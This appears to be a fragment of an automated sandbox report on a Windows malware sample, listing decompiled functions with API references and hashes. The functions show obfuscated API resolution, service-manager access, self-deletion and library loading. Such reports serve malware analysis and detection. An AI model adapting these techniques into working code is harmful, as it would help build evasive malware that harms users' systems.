SetErrorMode.KERNELBASE(00000000,00000000,0041845B,00000000,00000000,00000000,00000000,?,00000000,?,0040ECAE,00000000,00000000,00000000,00000000,00406468), ref: 0042647D
SetErrorMode.KERNELBASE(00000000,?,00000000,?,0040ECAE,00000000,00000000,00000000,00000000,00406468,00000000), ref: 00426484

Part of subcall function 004264D7: GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?), ref: 00426508
Part of subcall function 004264D7: lstrcpyA.KERNEL32(?,.HLP,?,?,00000104), ref: 004265A9
Part of subcall function 004264D7: lstrcatA.KERNEL32(?,.INI,?,?,00000104), ref: 004265D6

Strings

hd@, xrefs: 004264B2

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: ErrorMode$FileModuleNamelstrcatlstrcpy
String ID: hd@
API String ID: 3389432936-3469257913
Opcode ID: cd2bf83e0aada7a78a64cd33e34dd8ad1fec100a5d14c2182ee5260116b148ae
Instruction ID: 56c02cd2a0ca812c609797d7f3c2b0aa536ab85d6a731917afc158bbbb4402dc
Opcode Fuzzy Hash: cd2bf83e0aada7a78a64cd33e34dd8ad1fec100a5d14c2182ee5260116b148ae
Instruction Fuzzy Hash: F2F04F71A043205FD714FF25E484B0A7BD4AF44714F06844FF4889B3A2CBB8E841CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00412710, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 88%

			E00412710() {
				void* _t6;
				void* _t7;
				struct HHOOK__* _t9;
				void* _t18;

				_t6 = E00424BFB();
				if( *((char*)(_t6 + 0x14)) == 0) {
					_t7 = E004249C4();
					_t9 = SetWindowsHookExA(0xffffffff, E00412A65, 0, GetCurrentThreadId()); // executed
					_push(E00424441);
					 *(_t7 + 0x30) = _t9;
					_t18 = E00425D27(0x439c50);
					if( *((intOrPtr*)(_t18 + 0x14)) != 0) {
						 *((intOrPtr*)(_t18 + 0x14))( *((intOrPtr*)(E00424BFB() + 8)));
					}
					return E00425C92(0x439c4c, E00424456);
				}
				return _t6;
			}

0x00412710
0x00412719
0x0041271c
0x00412733
0x00412739
0x00412743
0x0041274b
0x00412751
0x0041275b
0x0041275b
0x00000000
0x0041276d
0x0041276e

APIs

GetCurrentThreadId.KERNEL32 ref: 00412723
SetWindowsHookExA.USER32 ref: 00412733

Part of subcall function 00425D27: __EH_prolog.LIBCMT ref: 00425D2C

Strings

`,K, xrefs: 0041273E

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: CurrentH_prologHookThreadWindows
String ID: `,K
API String ID: 2183259885-1873404292
Opcode ID: 82dfa06e578934c154c706557db465714f2c1539f2333c53d4548f0f4d9798f3
Instruction ID: e1aa810c2eef3cfbe5d0c04a06800172916402ab6d7e5109c2f22e34ec283244
Opcode Fuzzy Hash: 82dfa06e578934c154c706557db465714f2c1539f2333c53d4548f0f4d9798f3
Instruction Fuzzy Hash: 59F020313006302BCB307B70BA0EB5A2A90DF44318F804A1BF0619A0E2CBBC8C80C7AD

Uniqueness

Uniqueness Score: -1.00%

Function 0060002D, Relevance: 4.9, APIs: 3, Instructions: 387
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNativeSystemInfo.KERNELBASE(?,?,?,?,00600005), ref: 006000E9
VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,00600005), ref: 00600111

Memory Dump Source

Source File: 00000000.00000002.230964663.0000000000600000.00000040.00000001.sdmp, Offset: 00600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_2ojdmC51As.jbxd

Yara matches

Similarity

API ID: AllocInfoNativeSystemVirtual
String ID:
API String ID: 2032221330-0
Opcode ID: 460d81c489b0c162692d77f33f70033fe6d40d0b28a700ce4a73fb1871822586
Instruction ID: 6a056932634aca41250867a94fda34c42f8ef56db5c7f801923ae1e46585df77
Opcode Fuzzy Hash: 460d81c489b0c162692d77f33f70033fe6d40d0b28a700ce4a73fb1871822586
Instruction Fuzzy Hash: 8FD1E171A843069FE718CF59C8807ABB3E2FF84308F18452DE8958B381E774E945CB91

Uniqueness

Uniqueness Score: -1.00%

Function 021E96B0, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 191
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 73%

			E021E96B0() {
				char _v524;
				unsigned int _v528;
				char _v536;
				void* _v544;
				void* __ebx;
				void* _t44;
				void* _t47;
				void* _t51;
				void* _t62;
				void* _t66;
				void* _t69;
				intOrPtr _t79;
				void* _t90;
				signed int _t103;
				void* _t116;
				void* _t117;
				void* _t118;
				void* _t121;
				void* _t122;

				_t117 = _v528;
				_t44 = 0x290b7473;
				_t116 = 0;
				_t2 = _t116 + 1; // 0x1
				_t79 = _t2;
				goto L1;
				do {
					while(1) {
						L1:
						_t121 = _t44 - 0x185037e0;
						if(_t121 > 0) {
							break;
						}
						if(_t121 == 0) {
							_v528 = 0x9fb;
							_v528 = _v528 ^ 0xe4a1a680;
							_v528 = _v528 << 0xd;
							_v528 = _v528 + 0xffffacfd;
							_t80 = _v528;
							_t44 = 0xac9ce62;
							_v528 = (_v528 - (0x2f684bdb * _t80 >> 0x20) >> 1) + (0x2f684bdb * _t80 >> 0x20) >> 4;
							_v528 = _v528 << 5;
							_v528 = _v528 ^ 0x3febe949;
							continue;
						} else {
							_t122 = _t44 - 0xac9ce62;
							if(_t122 > 0) {
								__eflags = _t44 - 0x143d843a;
								if(_t44 != 0x143d843a) {
									goto L32;
								} else {
									E021E7AB0(_t118);
									_t44 = 0x28458a2;
									continue;
								}
							} else {
								if(_t122 == 0) {
									_t66 =  *0x21eddb8;
									__eflags = _t66;
									if(_t66 == 0) {
										_t66 = E021E3E80(_t79, E021E3F20(0x667fdee), 0x505cb3fe, _t118);
										 *0x21eddb8 = _t66;
									}
									 *_t66(_t117);
									_t44 = 0x67ba340;
									continue;
								} else {
									if(_t44 == 0x28458a2) {
										_t69 =  *0x21ede58;
										__eflags = _t69;
										if(_t69 == 0) {
											_t69 = E021E3E80(_t79, E021E3F20(0xbb398380), 0xb1aefb5, _t118);
											 *0x21ede58 = _t69;
										}
										 *_t69(0,  &_v524, 0x104);
										 *((intOrPtr*)( *0x21ee2ec + 0x48)) = E021E3D10( &_v536);
										_t44 = 0x311c267c;
										continue;
									} else {
										if(_t44 != 0x67ba340) {
											goto L32;
										} else {
											_t90 =  *0x21edf38;
											if(_t90 == 0) {
												_t90 = E021E3E80(_t79, E021E3F20(0xf9c30097), 0x62c574d8, _t118);
												 *0x21edf38 = _t90;
											}
											 *_t90(0, _v528, 0, 0,  *0x21ee2ec + 0x5c); // executed
											_t44 = 0x143d843a;
											_t116 =  ==  ? _t79 : _t116;
											continue;
										}
									}
								}
							}
						}
						L38:
					}
					__eflags = _t44 - 0x311c267c;
					if(__eflags > 0) {
						__eflags = _t44 - 0x37104f21;
						if(_t44 != 0x37104f21) {
							goto L32;
						} else {
							__eflags =  *0x21ee0f4;
							if( *0x21ee0f4 == 0) {
								 *0x21ee0f4 = E021E3E80(_t79, E021E3F20(0x667fdee), 0x7f692adf, _t118);
							}
							_t47 = OpenSCManagerW(0, 0, 0xf003f); // executed
							_t117 = _t47;
							__eflags = _t117;
							if(_t117 == 0) {
								_t44 = 0x25965b99;
							} else {
								 *((intOrPtr*)( *0x21ee2ec + 0x268)) = _t79;
								_t44 = 0x185037e0;
							}
							goto L1;
						}
					} else {
						if(__eflags == 0) {
							_t51 =  *0x21edf38;
							__eflags = _t51;
							if(_t51 == 0) {
								_t51 = E021E3E80(_t79, E021E3F20(0xf9c30097), 0x62c574d8, _t118);
								 *0x21edf38 = _t51;
							}
							 *_t51(0, 0x25, 0, 0,  &_v524); // executed
							__eflags =  *0x21ee2ec + 0x10;
							E021E3070( *0x21ee2ec + 0x10);
							goto L37;
						} else {
							__eflags = _t44 - 0x25965b99;
							if(_t44 == 0x25965b99) {
								_v528 = 0x4b7f;
								_v528 = _v528 + 0xffffece0;
								_t103 = (_v528 - (0x3521cfb3 * _v528 >> 0x20) >> 1) + (0x3521cfb3 * _v528 >> 0x20) >> 5;
								_v528 = _t103;
								_v528 = (_t103 << 5) + _v528;
								_v528 = _v528 >> 2;
								_v528 = _v528 ^ 0x000008d8;
								 *((intOrPtr*)( *0x21ee2ec + 0x3c)) = 0x21e7c60;
								_t44 = 0x67ba340;
								goto L1;
							} else {
								__eflags = _t44 - 0x290b7473;
								if(_t44 != 0x290b7473) {
									goto L32;
								} else {
									_t62 = E021E42F0(_t79, 0x480);
									 *0x21ee2ec = _t62;
									__eflags = _t62;
									if(_t62 == 0) {
										L37:
										return _t116;
									} else {
										 *((intOrPtr*)(_t62 + 0x38)) = E021E7C70;
										_t44 = 0x37104f21;
										goto L1;
									}
								}
							}
						}
					}
					goto L38;
					L32:
					__eflags = _t44 - 0x20400186;
				} while (_t44 != 0x20400186);
				return _t116;
				goto L38;
			}

0x021e96b8
0x021e96bc
0x021e96c2
0x021e96c4
0x021e96c4
0x021e96c7
0x021e96d0
0x021e96d0
0x021e96d0
0x021e96d0
0x021e96d5
0x00000000
0x00000000
0x021e96db
0x021e97e7
0x021e97f4
0x021e97fc
0x021e9801
0x021e9809
0x021e980f
0x021e981d
0x021e9821
0x021e9826
0x00000000
0x021e96e1
0x021e96e1
0x021e96e6
0x021e97cd
0x021e97d2
0x00000000
0x021e97d8
0x021e97d8
0x021e97dd
0x00000000
0x021e97dd
0x021e96ec
0x021e96ec
0x021e979c
0x021e97a1
0x021e97a3
0x021e97b6
0x021e97bb
0x021e97bb
0x021e97c1
0x021e97c3
0x00000000
0x021e96f2
0x021e96f7
0x021e974e
0x021e9753
0x021e9755
0x021e9768
0x021e976d
0x021e976d
0x021e977e
0x021e978f
0x021e9792
0x00000000
0x021e96f9
0x021e96fe
0x00000000
0x021e9704
0x021e9704
0x021e970c
0x021e9724
0x021e9726
0x021e9726
0x021e9740
0x021e9744
0x021e9749
0x00000000
0x021e9749
0x021e96fe
0x021e96f7
0x021e96ec
0x021e96e6
0x00000000
0x021e96db
0x021e9833
0x021e9838
0x021e98d6
0x021e98db
0x00000000
0x021e98dd
0x021e98e2
0x021e98e4
0x021e98fc
0x021e98fc
0x021e990a
0x021e990c
0x021e990e
0x021e9910
0x021e9927
0x021e9912
0x021e9917
0x021e991d
0x021e991d
0x00000000
0x021e9910
0x021e983e
0x021e983e
0x021e9948
0x021e994d
0x021e994f
0x021e9962
0x021e9967
0x021e9967
0x021e9979
0x021e9984
0x021e9988
0x00000000
0x021e9844
0x021e9844
0x021e9849
0x021e987e
0x021e988b
0x021e989f
0x021e98a2
0x021e98af
0x021e98b3
0x021e98b8
0x021e98c5
0x021e98cc
0x00000000
0x021e984b
0x021e984b
0x021e9850
0x00000000
0x021e9856
0x021e985b
0x021e9860
0x021e9865
0x021e9867
0x021e9990
0x021e999b
0x021e986d
0x021e986d
0x021e9874
0x00000000
0x021e9874
0x021e9867
0x021e9850
0x021e9849
0x021e983e
0x00000000
0x021e9931
0x021e9931
0x021e9931
0x021e9947
0x00000000

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,00000000,2564BE4F), ref: 021E990A

Strings

I?, xrefs: 021E9826

Memory Dump Source

Source File: 00000000.00000002.231384792.00000000021E1000.00000020.00000001.sdmp, Offset: 021E0000, based on PE: true

Associated: 00000000.00000002.231376146.00000000021E0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.231395549.00000000021ED000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.231403140.00000000021F0000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21e0000_2ojdmC51As.jbxd

Yara matches

Similarity

API ID: ManagerOpen
String ID: I?
API String ID: 1889721586-46180575
Opcode ID: a70ed0296e8f769d92b824a955a45f898bdb4136ab01eb26598515a7fca3fda4
Instruction ID: e28d44ef97c94e38d989d70dab5f47936828b29e59fa076f1dcda5196866622b
Opcode Fuzzy Hash: a70ed0296e8f769d92b824a955a45f898bdb4136ab01eb26598515a7fca3fda4
Instruction Fuzzy Hash: FA61C2B1B84A019FDE18AE689C8573F73D5AB84614F45885EF567CF290DB34D844CF82

Uniqueness

Uniqueness Score: -1.00%

Function 021E36B0, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63
fileCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E021E36B0(void* __ecx, void* __edi, void* __esi, void* __eflags) {
				char _v520;
				intOrPtr* _t3;
				intOrPtr* _t5;
				intOrPtr* _t7;
				int _t10;
				void* _t16;
				void* _t34;
				void* _t35;
				void* _t38;
				void* _t40;
				void* _t41;
				WCHAR* _t42;

				_t41 =  &_v520;
				_t34 = __ecx;
				_t38 = E021E34C0(0x21ed210);
				_t3 =  *0x21edc60;
				if(_t3 == 0) {
					_t3 = E021E3E80(_t16, E021E3F20(0xe66945e6), 0xcca28b0d, _t40);
					 *0x21edc60 = _t3;
				}
				 *_t3( &_v520, 0x104, _t38, _t34);
				_t5 =  *0x21edea8;
				_t42 = _t41 + 0x10;
				if(_t5 == 0) {
					_t5 = E021E3E80(_t16, E021E3F20(0xbb398380), 0x97f883e, _t40);
					 *0x21edea8 = _t5;
				}
				_t35 =  *_t5();
				_t7 =  *0x21ee1a0;
				if(_t7 == 0) {
					_t7 = E021E3E80(_t16, E021E3F20(0xbb398380), 0x26c3f343, _t40);
					 *0x21ee1a0 = _t7;
				}
				 *_t7(_t35, 0, _t38);
				if( *0x21edf94 == 0) {
					 *0x21edf94 = E021E3E80(_t16, E021E3F20(0xbb398380), 0x86a49eb, _t40);
				}
				_t10 = DeleteFileW(_t42); // executed
				return _t10;
			}

0x021e36b0
0x021e36b8
0x021e36c4
0x021e36c6
0x021e36cd
0x021e36e0
0x021e36e5
0x021e36e5
0x021e36f6
0x021e36f8
0x021e36fd
0x021e3702
0x021e3715
0x021e371a
0x021e371a
0x021e3721
0x021e3723
0x021e372a
0x021e373d
0x021e3742
0x021e3742
0x021e374b
0x021e3756
0x021e376e
0x021e376e
0x021e3777
0x021e377f

APIs

DeleteFileW.KERNELBASE ref: 021E3777

Strings

Ei, xrefs: 021E36CF

Memory Dump Source

Source File: 00000000.00000002.231384792.00000000021E1000.00000020.00000001.sdmp, Offset: 021E0000, based on PE: true

Associated: 00000000.00000002.231376146.00000000021E0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.231395549.00000000021ED000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.231403140.00000000021F0000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21e0000_2ojdmC51As.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID: Ei
API String ID: 4033686569-3988083245
Opcode ID: f0d76d1668e9c3fc8a92fad05bb274b18dbd5839d31ffc2588966572c5d01923
Instruction ID: b40a85d1b7972229fda400a7fbf667eccb58ab4f56d94796c606c3e454007a88
Opcode Fuzzy Hash: f0d76d1668e9c3fc8a92fad05bb274b18dbd5839d31ffc2588966572c5d01923
Instruction Fuzzy Hash: AF116076F80601AFDF14B7B5AC5463B31DB9BC4644B1408ACE437CB244EF7489518BD2

Uniqueness

Uniqueness Score: -1.00%

Function 0040796F, Relevance: 3.0, APIs: 2, Instructions: 20
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040796F(intOrPtr _a4) {
				void* _t6;
				void* _t9;

				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
				 *0x43b63c = _t6;
				if(_t6 == 0) {
					L3:
					return 0;
				} else {
					if(E00407A4A() != 0) {
						_t9 = 1;
						return _t9;
					} else {
						HeapDestroy( *0x43b63c);
						goto L3;
					}
				}
			}

0x00407980
0x00407988
0x0040798d
0x004079a4
0x004079a6
0x0040798f
0x00407996
0x004079a9
0x004079aa
0x00407998
0x0040799e
0x00000000
0x0040799e
0x00407996

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000,004063E6,00000001), ref: 00407980

Part of subcall function 00407A4A: HeapAlloc.KERNEL32(00000000,00000140,00407994), ref: 00407A57

HeapDestroy.KERNEL32 ref: 0040799E

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Heap$AllocCreateDestroy
String ID:
API String ID: 2236781399-0
Opcode ID: 645681982fc8d61ddb20c8e825624fd1c02a5afe8e3a61baadfadfb8e0cb624d
Instruction ID: 148b4dcf31a7c6b17fb8364a85278eb553451c51f0f99df079208ecffef983c8
Opcode Fuzzy Hash: 645681982fc8d61ddb20c8e825624fd1c02a5afe8e3a61baadfadfb8e0cb624d
Instruction Fuzzy Hash: 26E012B0755301AEEB101B31AC0677A36D4DB54782F149436F544D41F4E7B895519A4B

Uniqueness

Uniqueness Score: -1.00%

Function 021E5CA0, Relevance: 3.0, APIs: 2, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_() {
				void* _t5;
				void* _t8;
				void* _t10;

				E021E6530(_t8);
				if( *0x21ee094 == 0) {
					 *0x21ee094 = E021E3E80(_t5, E021E3F20(0xbb398380), 0xff20810a, _t10);
				}
				ExitProcess(0);
			}

0x021e5ca0
0x021e5cac
0x021e5cc4
0x021e5cc4
0x021e5ccb

APIs

ExitProcess.KERNEL32(00000000), ref: 021E5CCB

Memory Dump Source

Source File: 00000000.00000002.231384792.00000000021E1000.00000020.00000001.sdmp, Offset: 021E0000, based on PE: true

Associated: 00000000.00000002.231376146.00000000021E0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.231395549.00000000021ED000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.231403140.00000000021F0000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21e0000_2ojdmC51As.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: e5e7250f1578daca283f8a946277e868fb3cb8ef122894f533a4a86c86ed2de8
Instruction ID: b6080b433fea16405735fb2cf2910673bbee997a410ebb2bef317b3ae1f63a5f
Opcode Fuzzy Hash: e5e7250f1578daca283f8a946277e868fb3cb8ef122894f533a4a86c86ed2de8
Instruction Fuzzy Hash: 86D0C932BC1B40EAEE047AF06C6073B259B4FC0654F444859E5178F288EB6188118A92

Uniqueness

Uniqueness Score: -1.00%

Function 021E6FB0, Relevance: 1.6, APIs: 1, Instructions: 107
libraryCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E021E6FB0(void* __ebx) {
				void* _t2;
				struct HINSTANCE__* _t5;
				intOrPtr* _t6;
				intOrPtr* _t8;
				void* _t21;
				void* _t48;
				WCHAR* _t51;
				void* _t53;
				void* _t54;
				void* _t55;

				_t21 = __ebx;
				_t2 = 0x2f7561b9;
				goto L1;
				do {
					while(1) {
						L1:
						_t54 = _t2 - 0x16eb9dc5;
						if(_t54 > 0) {
							break;
						}
						if(_t54 == 0) {
							E021E6F10(_t21, 0x21ed770, 4, __eflags);
							_t2 = 0x28da268b;
							continue;
						} else {
							_t55 = _t2 - 0x96aa655;
							if(_t55 > 0) {
								__eflags = _t2 - 0x129c963b;
								if(__eflags != 0) {
									goto L21;
								} else {
									E021E6F10(_t21, 0x21ed7c0, 3, __eflags);
									_t2 = 0x16eb9dc5;
									continue;
								}
							} else {
								if(_t55 == 0) {
									E021E6F10(_t21, 0x21ed840, 1, __eflags);
									_t2 = 0x6462a46;
									continue;
								} else {
									if(_t2 == 0x34398df) {
										E021E6F10(_t21, 0x21ed820, 0, __eflags);
										_t2 = 0x96aa655;
										continue;
									} else {
										_t57 = _t2 - 0x6462a46;
										if(_t2 != 0x6462a46) {
											goto L21;
										} else {
											E021E6F10(_t21, 0x21ed890, 2, _t57);
											_t2 = 0x129c963b;
											continue;
										}
									}
								}
							}
						}
						L30:
					}
					__eflags = _t2 - 0x2cd0d411;
					if(__eflags > 0) {
						__eflags = _t2 - 0x2f7561b9;
						if(__eflags != 0) {
							goto L21;
						} else {
							_t2 = 0x34398df;
							goto L1;
						}
					} else {
						if(__eflags == 0) {
							_t51 = E021E34C0(0x21ed7f0);
							__eflags =  *0x21eddc4;
							if( *0x21eddc4 == 0) {
								 *0x21eddc4 = E021E3E80(_t21, E021E3F20(0xbb398380), 0x9261db99, _t53);
							}
							_t5 = LoadLibraryW(_t51); // executed
							 *( *0x21ee2e8 + 0x28) = _t5;
							_t6 =  *0x21edea8;
							__eflags = _t6;
							if(_t6 == 0) {
								_t6 = E021E3E80(_t21, E021E3F20(0xbb398380), 0x97f883e, _t53);
								 *0x21edea8 = _t6;
							}
							_t48 =  *_t6();
							_t8 =  *0x21ee1a0;
							__eflags = _t8;
							if(_t8 == 0) {
								_t8 = E021E3E80(_t21, E021E3F20(0xbb398380), 0x26c3f343, _t53);
								 *0x21ee1a0 = _t8;
							}
							return  *_t8(_t48, 0, _t51);
						} else {
							__eflags = _t2 - 0x17b18c59;
							if(__eflags == 0) {
								E021E6F10(_t21, 0x21ed870, 6, __eflags);
								_t2 = 0x2cd0d411;
								goto L1;
							} else {
								__eflags = _t2 - 0x28da268b;
								if(__eflags != 0) {
									goto L21;
								} else {
									E021E6F10(_t21, 0x21ed790, 5, __eflags);
									_t2 = 0x17b18c59;
									goto L1;
								}
							}
						}
					}
					goto L30;
					L21:
					__eflags = _t2 - 0x2a0eb481;
				} while (__eflags != 0);
				return _t2;
				goto L30;
			}

0x021e6fb0
0x021e6fb0
0x021e6fb0
0x021e6fb5
0x021e6fb5
0x021e6fb5
0x021e6fb5
0x021e6fba
0x00000000
0x00000000
0x021e6fc0
0x021e704a
0x021e704f
0x00000000
0x021e6fc2
0x021e6fc2
0x021e6fc7
0x021e701c
0x021e7021
0x00000000
0x021e7027
0x021e7031
0x021e7036
0x00000000
0x021e7036
0x021e6fc9
0x021e6fc9
0x021e7010
0x021e7015
0x00000000
0x021e6fcb
0x021e6fd0
0x021e6ffa
0x021e6fff
0x00000000
0x021e6fd2
0x021e6fd2
0x021e6fd7
0x00000000
0x021e6fdd
0x021e6fe7
0x021e6fec
0x00000000
0x021e6fec
0x021e6fd7
0x021e6fd0
0x021e6fc9
0x021e6fc7
0x00000000
0x021e6fc0
0x021e7059
0x021e705e
0x021e70a2
0x021e70a7
0x00000000
0x021e70a9
0x021e70a9
0x00000000
0x021e70a9
0x021e7060
0x021e7060
0x021e70cb
0x021e70d2
0x021e70d4
0x021e70ec
0x021e70ec
0x021e70f2
0x021e70fa
0x021e70fd
0x021e7102
0x021e7104
0x021e7117
0x021e711c
0x021e711c
0x021e7123
0x021e7125
0x021e712a
0x021e712c
0x021e713f
0x021e7144
0x021e7144
0x021e7151
0x021e7062
0x021e7062
0x021e7067
0x021e7093
0x021e7098
0x00000000
0x021e7069
0x021e7069
0x021e706e
0x00000000
0x021e7070
0x021e707a
0x021e707f
0x00000000
0x021e707f
0x021e706e
0x021e7067
0x021e7060
0x00000000
0x021e70b3
0x021e70b3
0x021e70b3
0x021e70be
0x00000000

APIs

LoadLibraryW.KERNELBASE(00000000,?,2564BE4F,021E68DC), ref: 021E70F2

Memory Dump Source

Source File: 00000000.00000002.231384792.00000000021E1000.00000020.00000001.sdmp, Offset: 021E0000, based on PE: true

Associated: 00000000.00000002.231376146.00000000021E0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.231395549.00000000021ED000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.231403140.00000000021F0000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21e0000_2ojdmC51As.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 9c727e72d3d9d3c222774f0a86220be600b64efe2f8a1199c5d6049eaa37a6da
Instruction ID: 655b703cf3b8911c7ff3d05b736625c09db6d6250f33e1d3192058b077c2f9c6
Opcode Fuzzy Hash: 9c727e72d3d9d3c222774f0a86220be600b64efe2f8a1199c5d6049eaa37a6da
Instruction Fuzzy Hash: 8A31C820BC4D419FAD286AA86DA073BA19B9792244FA4086EF013CF385CF65CD424BD3

Uniqueness

Uniqueness Score: -1.00%

Function 021E6F10, Relevance: 1.5, APIs: 1, Instructions: 45
libraryCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E021E6F10(void* __ebx, void* __ecx, signed int __edx, void* __eflags) {
				struct HINSTANCE__* _t6;
				intOrPtr* _t7;
				intOrPtr* _t9;
				signed int _t28;
				void* _t29;
				WCHAR* _t30;
				void* _t31;

				_t15 = __ebx;
				_t28 = __edx;
				_t30 = E021E34C0(__ecx);
				if( *0x21eddc4 == 0) {
					 *0x21eddc4 = E021E3E80(__ebx, E021E3F20(0xbb398380), 0x9261db99, _t31);
				}
				_t6 = LoadLibraryW(_t30); // executed
				 *( *0x21ee2e8 + 0xc + _t28 * 4) = _t6;
				_t7 =  *0x21edea8;
				if(_t7 == 0) {
					_t7 = E021E3E80(_t15, E021E3F20(0xbb398380), 0x97f883e, _t31);
					 *0x21edea8 = _t7;
				}
				_t29 =  *_t7();
				_t9 =  *0x21ee1a0;
				if(_t9 == 0) {
					_t9 = E021E3E80(_t15, E021E3F20(0xbb398380), 0x26c3f343, _t31);
					 *0x21ee1a0 = _t9;
				}
				return  *_t9(_t29, 0, _t30);
			}

0x021e6f10
0x021e6f12
0x021e6f19
0x021e6f22
0x021e6f3a
0x021e6f3a
0x021e6f40
0x021e6f48
0x021e6f4c
0x021e6f53
0x021e6f66
0x021e6f6b
0x021e6f6b
0x021e6f72
0x021e6f74
0x021e6f7b
0x021e6f8e
0x021e6f93
0x021e6f93
0x021e6fa0

APIs

LoadLibraryW.KERNELBASE(00000000,?,2564BE4F,021E704F,021E68DC), ref: 021E6F40

Memory Dump Source

Source File: 00000000.00000002.231384792.00000000021E1000.00000020.00000001.sdmp, Offset: 021E0000, based on PE: true

Associated: 00000000.00000002.231376146.00000000021E0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.231395549.00000000021ED000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.231403140.00000000021F0000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21e0000_2ojdmC51As.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: fcab8489e5b5a63659c8f3a6f6087155d22336553ef4ea883d4fb34ee19929bf
Instruction ID: 52aedf0ff12c53cef0217389d3fe129597675f20098e3717e296e08e3ca0b394
Opcode Fuzzy Hash: fcab8489e5b5a63659c8f3a6f6087155d22336553ef4ea883d4fb34ee19929bf
Instruction Fuzzy Hash: 18012C35B81601AF9F18BBF5BC6063B22EB9BC069475808ADF026CF344EB349C514B92

Uniqueness

Uniqueness Score: -1.00%

Function 00408198, Relevance: 1.3, APIs: 1, Instructions: 85
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00408198(void* __ecx, intOrPtr _a4) {
				intOrPtr _v8;
				signed int _t45;
				intOrPtr _t48;
				signed int _t49;
				intOrPtr _t51;
				intOrPtr _t52;
				intOrPtr _t53;
				signed int _t54;
				intOrPtr* _t55;
				signed int _t57;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t62;
				void* _t69;
				void* _t70;
				void* _t77;
				signed int _t78;
				intOrPtr _t81;

				_t60 = _a4;
				_t81 =  *((intOrPtr*)(_t60 + 0x10));
				_t45 =  *(_t60 + 8);
				_t57 = 0;
				while(_t45 >= 0) {
					_t45 = _t45 << 1;
					_t57 = _t57 + 1;
				}
				_t69 = 0x3f;
				_t48 = _t57 * 0x204 + _t81 + 0x144;
				_v8 = _t48;
				do {
					 *((intOrPtr*)(_t48 + 8)) = _t48;
					 *((intOrPtr*)(_t48 + 4)) = _t48;
					_t48 = _t48 + 8;
					_t69 = _t69 - 1;
				} while (_t69 != 0);
				_t77 = (_t57 << 0xf) +  *((intOrPtr*)(_t60 + 0xc));
